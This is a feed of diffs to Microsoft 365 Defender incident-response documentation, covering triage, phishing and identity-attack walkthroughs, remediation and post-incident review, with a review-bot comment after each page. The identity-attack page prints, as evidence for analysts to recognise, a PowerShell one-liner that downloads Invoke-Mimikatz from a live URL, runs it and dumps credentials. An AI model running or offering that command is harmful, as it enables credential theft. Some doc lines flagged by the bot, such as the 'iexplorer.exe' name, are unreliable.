+There are multiple ways to read and analyze data using Microsoft 365 Defender but the end goal for analysts is to respond to incidents as quickly as possible. While Microsoft 365 Defender can significantly reduce [Mean Time to Remediate (MTTR)](https://www.microsoft.com/security/blog/2020/05/04/lessons-learned-microsoft-soc-part-3c/) through the industry-leading Auto-Remediation feature, there are always cases that require manual analysis.
+
+Here's an example:
+
+1. Once triage priority has been determined, an analyst begins an in-depth analysis by selecting the incident name. This page brings up the **Incident Summary** where data is displayed in tabs to assist with the analysis. Under the **Alerts** tab the type of alerts are displayed. Analysts can click on each alert to drill down into the respective detection source.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-summary-tab.png" alt-text="Example of the Summary tab of an incident":::
+
+ For a quick guide about which domain each detection source covers, review the [Detect](#detection-by-microsoft-365-defender) section of this article.
+
+2. From the **Alerts** tab, an analyst can pivot to the detection source to conduct a more in-depth investigation and analysis. For example, selecting Malware Detection with Microsoft Cloud App Security as the detection source takes the analyst to its corresponding alert page.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-select-alert.png" alt-text="Example of selecting an alert of an incident":::
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-link-to-mcas.png" alt-text="Example of a corresponding page in Microsoft Cloud App Security":::
+
+3. To investigate our example further, scrolling to the bottom of the page to view the **Users affected**. To see the activity and context surrounding the malware detection, select Annette HillΓÇÖs user page .
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-user-page.png" alt-text="Example of a user page":::
+
+4. On the user page is a chronological list of events starting with a *Risky Sign-in from a TOR network IP Address* alert. While the suspiciousness of an activity depends on the nature of how an organization conducts its business, in most cases the use of The Onion Router (TOR), a network that allows users to browse the web anonymously, in an enterprise environment might be considered highly unlikely and unnecessary for regular online operations.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-user-event-list.png" alt-text="Example of the chronological list of events for a user":::
+
+5. Each alert can be selected to obtain more information on the activity. For example, selecting **Activity from a Tor IP Address** alert leads you to that alertΓÇÖs own page. Annette is an Administrator of Office 365, which means she has elevated privileges and the source incident might have led to access to confidential information.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-mcas-alert.png" alt-text="Example of alerts details for Microsoft Cloud App Security ":::
+
+6. By selecting other alerts, an analyst can get a complete picture of the attack.
+
+## Next step
+
+[![Step 2: Learn how to remediate incidents](../../medi)
+
+Learn how to [remediate incidents](first-incident-remediate.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
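Review bot: Two procedure steps in this new article have wording errors that change how they read: triage step 1 says "sort the incident queue by some these columns" (missing "of"), and analysis step 3 begins "To investigate our example further, scrolling to the bottom of the page", which has no main verb and should be "scroll to the bottom of the page". The apostrophes in "organizationΓÇÖs", "incidentΓÇÖs", "alertΓÇÖs" and "Annette HillΓÇÖs" appear mis-encoded in the added lines, so check the file encoding or use straight apostrophes. The sentence "NIST recommends also considering the functional and informational impact of the incident, and recoverability" should link to the NIST guidance it refers to, and the `[Detect]` link text in analysis step 1 should use the target section's actual title, "Detection by Microsoft 365 Defender".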
security First Incident Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-overview.md
+
+ Title: Introduction to responding to your first incident
+description: The basics of responding to your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Introduction to responding to your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+An organization's incident response strategy determines its ability to deal with increasingly disruptive security incidents and cybercrime. While taking preventative measures is important, the ability to act quickly to contain, eradicate, and recover from detected incidents can minimize damage and business losses.
+
+This incident response walkthrough shows how you, as part of a security operations team, can perform most of the key incident response steps within Microsoft 365 Defender. Here are the steps:
+
+- Preparation of your security posture
+- For each incident:
+ - Step 1: Triage and analysis
+ - Step 2: Remediation (containment, eradication, and recovery)
+ - Step 3: Post-incident review
+
+A security incident is defined by National Institute of Standards and Technology (NIST) as "an occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system; or the information the system processes, stores, or transmits; or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies."
+
+Incidents in Microsoft 365 Defender are the logical starting points for analysis and incident response. Analyzing and remediating incidents typically makes up most of a security operations team's tasks.
+
+## Next step
+
+[![Prepare your organization and Microsoft 365 tenant](../../medi)
+
+Make sure your organization and Microsoft 365 tenant is [prepared for incident handling](first-incident-prepare.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
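Review bot: The closing sentence "Make sure your organization and Microsoft 365 tenant is prepared for incident handling" has a plural subject, so it should read "are prepared". The quoted NIST definition of a security incident has no link or reference to the publication it is taken from; since it is a direct quotation, add the source. The metadata key is written as `Title:` with a capital T and leading space while the sibling keys (`description:`, `keywords:`) are lowercase, so confirm the front matter parses.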
security First Incident Path Identity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-identity.md
+
+ Title: Example of an identity-based attack
+description: Step through an example analysis of an identity-based attack.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Example of an identity-based attack
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft Defender for Identity can help detect malicious attempts to compromise identities in your organization. Because Defender for Identity integrates with Microsoft 365 Defender, security analysts can have visibility on threats coming in from Defender for Identity, such as suspected Netlogon privilege elevation attempts.
+
+## Analyzing the attack in Microsoft Defender for Identity
+
+Microsoft 365 Defender allows analysts to filter alerts by detection source on the **Alerts** tab of the incidents page. In the following example, the detection source is filtered to **Defender for Identity**.
++
+Selecting the **Suspected overpass-the-hash attack** alert goes to a page in Microsoft Cloud App Security that displays more detailed information. You can always find out more about an alert or attack by selecting **Learn more about this alert type** to read a [description of the attack](https://docs.microsoft.com/defender-for-identity/lateral-movement-alerts#suspected-overpass-the-hash-attack-kerberos-external-id-2002) as well as remediation suggestions.
+
+
+## Investigating the same attack in Microsoft Defender for Endpoint
+
+Alternatively, an analyst can use Defender for Endpoint to learn more about the activity on an endpoint. Select the incident from the incident queue, then select the **Alerts** tab. From here, they can identify the detection source as well. A detection source labeled as EDR stands for Endpoint Detection and Response, which is Defender for Endpoint. From here, the analyst select an alert detected by EDR.
++
+The alert page displays various pertinent information such as the impacted device name, username, status of auto-investigation, and the alert details. The alert story depicts a visual representation of the process tree. The process tree is a hierarchical representation of parent and child processes related to the alert.
++
+Each process can be expanded to view additional details. Details that an analyst can see are the actual commands that were entered as part of a malicious script, outbound connection IP addresses, and other useful information.
+
+
+By selecting **See in timeline**, an analyst can drill down even further to determine the exact time of the compromise.
+
+Microsoft Defender for Endpoint can detect many malicious files and scripts. However, due to many legitimate uses for outbound connections, PowerShell, and command-line activity, some activity would be considered benign until it creates a malicious file or activity. Therefore, using the timeline helps analysts to put the alert into context with the surrounding activity to determine the original source or time of the attack that otherwise is obscured by common file system and user activity.
+
+To do this, an analyst would start at the time of the alert detection (in red) and scroll down backwards in time to determine when the original activity that led to the malicious activity actually started.
++
+It is important to understand and distinguish common activity such as Windows Update connections, Windows Trusted Software activation traffic, other common connections to Microsoft sites, third-party Internet activity, Microsoft Endpoint Configuration Manager activity, and other benign activity from suspicious activity. One way to accomplish this is by using timeline filters. There are many filters that can highlight specific activity while filtering out anything that the analyst does not want to view.
+
+In the image below, the analyst filtered to view only network and process events. This allows the analyst to see the network connections and processes surrounding the event where Notepad established a connection with an IP address, which we also saw in the process tree.
++
+In this particular event, Notepad was used to make a malicious outbound connection. However, often attackers will simply use iexplorer.exe to establish connections to download a malicious payload because ordinarily iexplorer.exe processes are considered regular web browser activity.
+
+Another item to look for in the timeline would be PowerShell uses for outbound connections. The analyst would look for successful PowerShell connections with commands such as `IEX (New-Object Net.Webclient)` followed by an outbound connection to a website hosting a malicious file.
+
+In the following example, PowerShell was used to download and execute Mimikatz from a website:
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
+```
+An analyst can quickly search for keywords by typing in the keyword in the search bar to display only events created with PowerShell.
+
+## Next step
+
+See the [phishing](first-incident-path-phishing.md) investigation path.
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Manage incidents](manage-incidents.md)
+- [Analyze incidents](investigate-incidents.md)
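Review bot: The paragraph about Notepad's outbound connection names the browser process as `iexplorer.exe` twice, but the Internet Explorer executable is `iexplore.exe`; an analyst who searches the timeline for the name as written will find nothing, so correct both occurrences. The Invoke-Mimikatz example is added as a `powershell` fenced block with a live raw.githubusercontent.com URL and `-DumpCreds`, which makes it copy-and-run; present it as an observed command line (for example with the URL defanged) so it reads as evidence to look for rather than a command to execute. The introduction cites "suspected Netlogon privilege elevation attempts" while the walkthrough uses the **Suspected overpass-the-hash attack** alert, and the section titled "Analyzing the attack in Microsoft Defender for Identity" says the alert opens in Microsoft Cloud App Security; align the example and the product names. Also fix "the analyst select an alert" to "selects".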
security First Incident Path Phishing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-phishing.md
+
+ Title: Example of a phishing email attack
+description: Step through an example analysis of an phishing attack.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Example of a phishing email attack
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft 365 Defender can help detect malicious attachments delivered via email. Since the [Office 365 Security and Compliance Center](https://protection.office.com/) integrates with Microsoft 365 Defender, security analysts can have visibility on threats coming in from Office 365, such as through email attachments.
+
+For example, an analyst was assigned a multi-stage incident.
+
+
+In the **Alerts** tab of the incident, alerts from Defender for Office 365 and Microsoft Cloud App Security are displayed. The analyst can drill down into the Defender for Office 365 alerts by selecting the email messages alerts. The details of the alert are displayed on the side pane.
+
+
+By scrolling down further, more information is displayed, showing the malicious files and user that was impacted.
+
+
+Selecting **Open alert page** takes you to the specific alert where various information can be viewed in greater detail by selecting the link. The actual email message can be viewed by selecting **View messages in Explorer** toward the bottom of the panel.
+
+
+This takes the analyst to the Threat Management page where the email Subject, Recipient, Sender, and other information are displayed. **ZAP** under **Special Actions** tells the analyst that the Zero-hour auto purge feature was implemented. ZAP automatically detects and removes malicious and spam messages from mailboxes across the organization. For more information, see [Zero-hour auto purge (ZAP) in Exchange Online](../office-365-security/zero-hour-auto-purge.md).
+
+Other actions can be taken on specific messages by selecting **Actions**.
+
+
+## Next step
+
+See the [identity-based attack](first-incident-path-identity.md) investigation path.
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
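Review bot: The `description` metadata reads "an phishing attack" and should be "a phishing attack". In the Threat Management paragraph, "tells the analyst that the Zero-hour auto purge feature was implemented" is ambiguous; if the point is that ZAP acted on this message, say "was applied to the message". "showing the malicious files and user that was impacted" should read "the user who was impacted". Several paragraphs ("For example, an analyst was assigned a multi-stage incident.") are followed by blank added lines where a screenshot appears to be expected, so confirm the image references were not dropped.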
security First Incident Post https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-post.md
+
+ Title: Step 3. Perform a post-incident review of your first incident
+description: How to perform a review of your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 3. Perform a post-incident review of your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+National Institute of Standards and Technology (NIST) recommends that once all steps have been taken to recover from the attack, organizations must review the incident to learn from it and learn and improve security posture or processes. Assessing the different aspects of incident-handling becomes important in preparing for the next incident.
+
+Microsoft 365 Defender can assist in performing post-incident activities by providing an organization with alerts that align with [MITRE ATT&CK Framework](https://attack.mitre.org/). All Microsoft Defender solutions label attacks in accordance with an ATT&CK tactic or technique.
+
+By mapping alerts to this industry framework, you can:
+
+- Conduct an analysis of gaps in security coverage.
+- Determine adversary and campaign attribution.
+- Perform trend analysis.
+- Identify skill gaps in attack method awareness.
+- Create a Power Automate Playbook for faster remediation.
+
+Post-incident review activity can also result in fine-tuning your security configuration and security team's processes, enhancing your organizationΓÇÖs response capabilities.
+
+## Next step
+
+See these additional investigation paths:
+
+- [Phishing email](first-incident-path-phishing.md)
+- [Identity-based attack](first-incident-path-identity.md)
++
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
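Review bot: The opening sentence says NIST "recommends" that organizations "must review the incident to learn from it and learn and improve security posture or processes"; "recommends" and "must" conflict, and "learn" is repeated, so reword to something like "recommends that organizations review the incident to learn from it and improve security posture or processes" and link the NIST guidance. In the list under "By mapping alerts to this industry framework, you can:", "Create a Power Automate Playbook for faster remediation" does not follow from ATT&CK mapping the way the other four items do; either explain the connection or move it out of the list. "organizationΓÇÖs" in the last body paragraph shows a mis-encoded apostrophe.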
security First Incident Prepare https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-prepare.md
+
+ Title: Prepare your security posture for your first incident
+description: Set up your Microsoft 365 tenant's security posture for your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Prepare your security posture for your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Preparing for incident handling involves setting up sufficient protection of an organization's network from different kinds of security incidents. To reduce the risk of security incidents, National Institute of Standards and Technology (NIST) recommends several security practices including risk assessments, hardening host security, configuring networks securely, and preventing malware.
+
+Microsoft 365 Defender can help address several aspects of incident prevention:
+
+- Implementing a [Zero Trust](https://docs.microsoft.com/security/zero-trust/) framework
+- Determining your security posture by assigning a score with [Microsoft Secure Score](microsoft-secure-score.md)
+- Preventing threats through vulnerability assessments in [Threat and Vulnerability Management](../defender-endpoint/next-gen-threat-and-vuln-mgt.md)
+- Understanding the latest security threats so you can prepare for them
+
+## Step 1. Implement Zero Trust
+
+[Zero Trust](https://docs.microsoft.com/security/zero-trust/) is an integrated security philosophy and end-to-end strategy that considers the complex nature of any modern environment, including the mobile workforce and the users, devices, applications and data, wherever they may be located. By providing a single pane of glass to manage all endpoint detections in a consistent way, Microsoft 365 Defender can make it easier for your security operations team to implement the [guiding principles](https://docs.microsoft.com/security/zero-trust/#guiding-principles-of-zero-trust) of Zero Trust.
+
+Components of Microsoft 365 Defender can display violations of rules that have been implemented to establish Conditional Access policies for Zero Trust by integrating data from Microsoft Defender for Endpoint (MDE) or other mobile security vendors as an information source for device compliance policies and implementation of device-based Conditional Access policies.
+
+Device risk directly influences what resources will be accessible by the user of that device. The denial of access to resources based on certain criteria is the main theme of Zero Trust and Microsoft 365 Defender provides information needed to determine the trust level criteria. For example, Microsoft 365 Defender can provide the software version level of a device through the Threat and Vulnerability Management page while Conditional Access policies restrict devices that have outdated or vulnerable versions.
+
+Automation is a crucial part of implementing and maintaining a Zero Trust environment while also reducing the number of alerts that would potentially lead to incident response (IR) events. Components of Microsoft 365 Defender can be automated such as remediation actions (known as investigations for an incident in the Microsoft 365 security center), notification actions, and even the creation of support tickets such as in [ServiceNow](https://microsoft.service-now.com/sp/).
+
+## Step 2. Determine your organizationΓÇÖs security posture
+
+Next, organizations can use the [Microsoft Secure Score](microsoft-secure-score.md) in Microsoft 365 Defender to determine your current security posture and consider recommendations on how to improve it. The higher the score is, the more security recommendations and improvement actions have been taken by the organization. Secure Score recommendations can be taken across different products and allow organizations to raise their scores even higher.
+
+
+## Step 3. Assess your organizationΓÇÖs vulnerability exposure
+
+Preventing incidents can help streamline security operations efforts to focus on on-going critical and important security incidents. Software vulnerabilities are often a preventable entry point for attacks that can lead to data theft, data loss, or disruption of business operations. If no attacks are on-going, security operations must strive to achieve and maintain an acceptable level of [vulnerability exposure](../defender-endpoint/tvm-exposure-score.md) in their organization.
+
+To check your software patching progress, visit the [Threat and Vulnerability Management](../defender-endpoint/next-gen-threat-and-vuln-mgt.md) page in Defender for Endpoint, which you can access from Microsoft 365 Defender through the **More resources** tab.
+
+
+## 4. Understand emerging threats
+
+Use [threat analytics](threat-analytics.md) in the Microsoft 365 security center to keep up-to-date with the current security threat landscape. Expert Microsoft security researchers create reports that describe the latest cyber-threats in detail so you can understand how they might affect your Microsoft 365 subscription, devices, and users. These reports can include:
+
+- Active threat actors and their campaigns
+- Popular and new attack techniques
+- Critical vulnerabilities
+- Common attack surfaces
+- Prevalent malware
+
+You can implement the recommendations of an emerging threat to strengthen your security posture and minimize your attack surface area.
+
+Make time in your schedule to regularly check the [Threat Analytics](threat-analytics.md) section of the Microsoft 365 security center.
+
+## Next step
+
+[![Step 1: Learn how to triage and analyze incidents](../../medi)
+
+Learn how to [triage and analyze incidents](first-incident-analyze.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
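Review bot: The ServiceNow link at the end of Step 1 targets `https://microsoft.service-now.com/sp/`, which is a hostname for one organization's ServiceNow instance rather than product or integration documentation; point it at a page that describes the ticketing integration, or drop the link. The section headings are also inconsistent: "## Step 1.", "## Step 2." and "## Step 3." are followed by "## 4. Understand emerging threats", which should read "## Step 4. Understand emerging threats". In the second paragraph of Step 1, the single sentence running from "Components of Microsoft 365 Defender can display violations" to "device-based Conditional Access policies" is hard to parse and would be clearer split in two.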
security First Incident Remediate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-remediate.md
+
+ Title: Step 2. Remediate your first incident
+description: How to get started in remediating your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 2. Remediate your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft 365 Defender not only provides detection and analysis capabilities but also provides containment and eradication of malware. Containment includes steps to reduce the impact of the attack while eradication ensures all traces of attacker activity are removed from the network. Microsoft 365 Defender offers several remediation actions which can be configured to auto-remediate depending on your operating system and the attack type.
+
+Microsoft 365 Defender offers several remediation actions that analysts can manually initiate. Actions are separated into two categories, Actions on devices and Actions on files. Some actions can be used to immediately stop the threat while other actions assist in further forensic analysis.
+
+## Actions on devices
+
+- **Isolate the device** - This activity immediately blocks all network traffic (internet and internal) to minimize the spread of malware and allow analysts to continue analysis without a malicious actor being able to continue an attack. The only connection allowed is to the Microsoft Defender for Identity service cloud so Microsoft Defender for Identity can continue to monitor the device.
+- **Restrict app execution** - To restrict an application from running, a code integrity policy is applied that only allows files to run if they are signed by a Microsoft-issued certificate. This method of restriction can help prevent an attacker from controlling compromised devices and performing further malicious activities.
+- **Run Antivirus scan** - A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Defender Antivirus is the active antivirus solution or not. If another antivirus vendor product is the primary endpoint protection solution, you can run Defender Antivirus in Passive mode.
+- **Initiate automated investigation** - You can start a new general purpose automated investigation on the device. While an investigation is running, any other alert generated from the device will be added to an ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.
+- **Initiate live response** - Live response is a capability that gives you instantaneous access to a device by using a remote shell connection. This gives you the ability to do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time. Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.
+- **Collect investigation package** - As part of the investigation or response process, you can collect an investigation package from a device. By collecting the investigation package, you can identify the current state of the device and further understand the tools and techniques used by the attacker.
+- **Consult a threat expert** (available in both Actions on devices and files) - You can consult a Microsoft threat expert for more insights regarding potentially compromised devices or devices that are already compromised. Microsoft threat experts can be engaged directly from within the Microsoft Defender Security Center for a timely and accurate response.
+
+## Actions on files
+
+- **Stop and quarantine file** - This action includes stopping running processes, quarantining files, and deleting persistent data, such as any registry keys. This action takes effect on devices with Windows 10, version 1703 or later, where the file was observed in the last 30 days.
+- **Add indicators to block or allow file** - Prevent further propagation of an attack in your organization by banning potentially malicious files or suspected malware. This operation will prevent the file from being read, written, or executed on devices in your organization.
+- **Download or collect file** ΓÇô This action allows analysts to download a file in a password protected .zip archive file for further analysis by the organization.
+- **Deep analysis** ΓÇô This action executes a file in a secure, fully instrumented cloud environment. Deep analysis results show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications, and communication with IP addresses.
+
+Continuing the example in [Detect, triage, and analyze incidents](first-incident-analyze.md#analyze-your-first-incident), an analyst can remediate this incident with these actions:
+
+1. Immediately reset the user account password
+2. Isolate the device in Microsoft 365 Defender until deep analysis is complete
+3. Ensure the malicious file was quarantined from SharePoint
+4. Check which endpoints were affected by malware
+5. Rebuild systems
+6. Check for similar Microsoft Cloud App Security alerts for other users
+7. Create a custom indicator in Microsoft Defender for Endpoint to block a Tor IP address
+8. Create a governance action in Microsoft Cloud App Security for this type of alert such as those shown in the following image:
+
+ :::image type="content" source="../../media/first-incident-remediate/first-incident-mcas-governance.png" alt-text="Example of governance actions in the Microsoft Cloud App Security portal":::
+
+Most of the remediation actions can be applied and tracked in Microsoft 365 Defender.
+
+## Using Playbooks
+
+In addition, automated remediation can be created using playbooks. Currently, Microsoft has [Playbook templates on GitHub](https://github.com/microsoft/Microsoft-Cloud-App-Security/tree/master/Playbooks) that provide playbooks for the following scenarios:
+
+- Remove sensitive file sharing after requesting user validation
+- Auto-triage infrequent country alerts
+- Request for manager action before disabling an account
+- Disable malicious inbox rules
+
+Playbooks use Power Automate to create custom robotic process automation flows to automate certain activities once specific criteria have been triggered. Organizations can create playbooks either from existing templates or from scratch.
+
+Here's an example.
+
+
+Playbooks can also be created during [post-incident review](first-incident-post.md) to create remediation actions from incidents for faster remediation actions.
+
+## Next step
+
+[![Step 3: Learn how to perform a post-incident review of an incident](../../medi)
+
+Learn how to [perform a post-incident review of an incident](first-incident-post.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
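Review bot: In the "Isolate the device" bullet, the retained connection is described as going to "the Microsoft Defender for Identity service cloud so Microsoft Defender for Identity can continue to monitor the device". Device isolation is a Defender for Endpoint action and the isolated device keeps its connection to the Defender for Endpoint service, so this looks like a product-name mix-up; please confirm and correct both mentions, because analysts rely on this sentence to know what still reaches an isolated host. Under "Using Playbooks", "Here's an example." is followed by nothing, so either add the missing image or example or remove the sentence. The closing sentence "to create remediation actions from incidents for faster remediation actions" repeats itself and can end at "from incidents".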
security Incidents Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/incidents-overview.md
Title: Incidents in Microsoft 365 Defender description: Investigate incidents seen across devices, users, and mailboxes in the Microsoft 365 security center.
-keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
search.product: eADQiWindows 10XVcnh ms.prod: m365-security ms.mktglfcycl: deploy
On an ongoing basis, identify the highest priority incidents for analysis and re
- [Managing](manage-incidents.md) incidents by modifying their title, assigning them to an analyst, and adding tags and comments. 1. For each incident, begin an [attack and alert analysis](investigate-incidents.md):-
+
a. View the summary of the incident to understand it's scope and severity and what entities are affected (the **Summary** tab). b. Begin analyzing the alerts to understand their origin, scope, and severity (the **Alerts** tab).
On an ongoing basis, identify the highest priority incidents for analysis and re
e. As needed, use information in the data set for the incident for more information (the **Evidence and Response** tab).
-2. After or during your analysis, address containment to reduce any additional impact of the attack and eradication of the security threat.
+2. After or during your analysis, perform containment to reduce any additional impact of the attack and eradication of the security threat.
3. As much as possible, recover from the attack by restoring your tenant resources to the state they were in before the incident.
On an ongoing basis, identify the highest priority incidents for analysis and re
- Recall the workflow you used to resolve the incident and update your standard workflows, processes, policies, and playbooks as needed. - Determine whether changes in your security configuration are needed and implement them.
+If you are new to security analysis, see the [introduction to responding to your first incident](incidents-overview.md) for additional information and to step through an example incident.
+ ## Example security operations for Microsoft 365 Defender Here's an example of security operations for Microsoft 365 Defender.
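Review bot: The added sentence "see the [introduction to responding to your first incident](incidents-overview.md)" links to incidents-overview.md from within incidents-overview.md, so the reader is sent back to the page they are already on; the target should be the first-incident introduction article. In the reworded step 2, "perform containment to reduce any additional impact of the attack and eradication of the security threat" leaves "eradication" hanging; "perform containment ... and eradicate the security threat" reads unambiguously. The unchanged context line "understand it's scope" should be "its scope" while this file is being touched.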
security Microsoft 365 Security Center Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-mdo.md
The Home page of the portal surfaces:
- Secure Score ratings - the number of users and devices at risk-- active incident lists
+- active incident queue
- lists of privileged OAuth apps - device health data - tweets from MicrosoftΓÇÖs security intelligence twitter feed
security Admin Submission https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/admin-submission.md
For other ways to submit email messages, URLs, and attachments to Microsoft, see
4. When you're finished, click the **Submit** button.
- ![URL submission example](../../media/submission-flyout-email.PNG)
+ ![New URL submission example](../../media/submission-flyout-email.PNG)
### Send a suspect URL to Microsoft
For other ways to submit email messages, URLs, and attachments to Microsoft, see
3. When you're finished, click the **Submit** button.
- ![Email submission example](../../media/submission-url-flyout.png)
+ ![New Email submission example](../../media/submission-url-flyout.png)
### Submit a suspected file to Microsoft
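Review bot: The alt text "New Email submission example" is attached to `submission-url-flyout.png` in the URL steps, and the preceding hunk has the inverse ("New URL submission example" on `submission-flyout-email.PNG`); the two descriptions appear swapped relative to the images, and this change carries the mismatch forward. Prefixing "New" also tells a screen-reader user nothing about the image; describe what the flyout shows instead, for example which fields are filled in before **Submit** is clicked.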
For other ways to submit email messages, URLs, and attachments to Microsoft, see
4. When you're finished, click the **Submit** button.
- ![Attachment submission example](../../media/submission-file-flyout.PNG)
+ ![New Attachment submission example](../../media/submission-file-flyout.PNG)
## View items Submitted for analysis
To change the filter criteria, click the **Submission ID** button and choose one
- **Submission type** - **Status**
-![Filter options for admin submissions](../../media/admin-submission-email-filter-options.png)
+![New Filter options for admin submissions](../../media/admin-submission-email-filter-options.png)
To export the results, click **Export** near the top of the page and select **Chart data** or **Table**. In the dialog that appears, save the .csv file.
To change the filter criteria, click the **Sender** button and choose one of the
- **Submission type** - **Sender IP**
-![Filter options for user submissions](../../media/user-submissions-filter-options.png)
+![New Filter options for user submissions](../../media/user-submissions-filter-options.png)
To export the results, click **Export** near the top of the page and select **Chart data** or **Table**. In the dialog that appears, save the .csv file.
Once a user submits a suspicious email to the custom mailbox, the user and admin
If you've configured the custom mailbox to intercept user-reported messages without sending the messages to Microsoft, you can find and send specific messages to Microsoft for analysis. This effectively moves a user submission to an admin submission.
-On the **Custom mailbox** tab, select a message in the list, click the **Action** button, and make one of the following selections:
+On the **User reported messages** tab, select a message in the list, click the **Action** button, and make one of the following selections:
- **Report clean** - **Report phishing** - **Report malware** - **Report spam**
-![Options on the Action button](../../media/user-submission-custom-mailbox-action-button.png)
+![New Options on the Action button](../../media/user-submission-custom-mailbox-action-button.png)
security Air Remediation Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-remediation-actions.md
